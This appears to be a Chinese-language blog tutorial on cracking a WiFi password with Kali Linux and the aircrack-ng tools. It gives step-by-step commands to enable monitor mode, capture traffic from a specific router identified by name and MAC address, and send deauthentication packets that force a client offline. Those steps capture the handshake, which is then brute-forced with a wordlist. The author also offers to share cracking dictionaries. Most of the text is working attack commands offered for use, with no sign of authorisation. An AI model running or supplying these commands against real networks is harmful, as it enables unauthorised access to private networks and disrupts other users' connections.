前言
本文直接使用kali操作系统进行相关操作,未使用虚拟机,在此不赘述虚拟机配置
如需要即插即用kali操作系统,可戳我。
正文
-
使用命令iwconfig,确定哪些无线解控是可用的,如图所示,无线网卡名称为wlan0。
-
使用airmon-ng命令监控无线传输,为监控模式 (monitor mode)设置拥有无线功能Kali通信接口
airmon-ng wlan0 start
- 命令返回的描述中表明有些进程可能会引起trouble,需要将其kill掉,使用命令
airmon-ng check kill
-
使用iwconfig,查看端口监听状态,如图所示,无线网卡名称已变为wlan0mon,表明监听成功。
-
使用以下命令查看本地无线环境:
airodump-ng wlan0mon
主要参数:
BSSID:标识无线接入点或路由器的MAC地址
PWR:无线功率,数值越大,信号越好
CH:广播频道
ENC:加密技术
ESSID:无线路由名称
- 检测无线网卡是否有数据包注入能力
aireplay-ng -9 wlan0mon
- 以破解名称为“TPGuest_31D2”的路由器为例,使用命令对其抓包并写入文件“/root/wifi/TPGuest_31D2”
airodump-ng wlan0mon --bssid CE:46:99:8A:31:D2 -c 1 --showack -w /root/wifi/TPGuest_31D2
- 如果我们只有一般的数据包,是无法进行密码破解的,我们需要的是用户连接WiFi时的握手包。
- 为了能尽快得到握手包,我们需要主动发送一个反认证包,断开设备与路由器的连接,迫使他重新进行连接
aireplay-ng -0 10 -a CE:46:99:8A:31:D2 -c CE:60:EA:E5:68:35 wlan0mon
0:表示我们正在启动一个取消鉴定攻击
10:表明我们将发送10个取消鉴定数据包
-a:目标接入点(路由器)BSSID
-c:需断开的客户端MAC地址
- 注:如果注入反认证包时,提示“mom0 is on channel x,but the AP uses channel x”时,需要关掉监听
airmon-ng stop wlan0mon
关闭后,重新进行抓包写入
airodump-ng wlan0 --bssid CE:46:99:8A:31:D2 -c 1 --showack -w /root/wifi/TPGuest_31D2
再执行注入反认证包
aireplay-ng -0 10 -a CE:46:99:8A:31:D2 -c CE:60:EA:E5:68:35 wlan0
- 检测到HandShake字样后,或该设备重新上线后,结束抓包
- 接下来就交给爆破字典进行暴力破解了
aircrack-ng -w /....../password.txt /root/wifi/TPGuest_31D2.cap
password.txt指代你的字典文件
TPGuest_31D2.cap为抓包写入的文件
- 提示KEY FOUND![password]时,破解成功。
- 破解是一个考验耐心的事情。可私信索取题主收藏的部分爆破字典。